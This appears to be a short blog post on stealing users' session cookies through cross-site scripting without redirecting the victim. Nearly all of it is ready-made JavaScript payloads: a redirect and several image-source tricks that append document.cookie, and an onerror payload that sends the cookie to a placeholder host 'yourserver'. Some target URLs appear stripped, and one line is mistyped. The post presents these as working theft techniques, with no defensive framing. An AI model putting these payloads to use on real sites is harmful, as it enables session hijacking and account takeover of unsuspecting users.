How to steal user cookies using XSS attack

We know that it is possible to steal the cookie by redirecting to “False” page etc like this

document.location= "" + document.cookie

But how to do without redirecting the user?

If you have full control of the JavaScript getting written to the page then you could just do

document.write('cookie: ' + document.cookie)

If you want it sent to another server, you could include it in a non-existent image:

document.write('<img src="' + document.cookie + '" />')


Another way is :

documentimage = new Image(); image.src=''+document.cookie;

One more :

<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

Uday Ogra

Connect with me at and lets have some healthy discussion :)

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *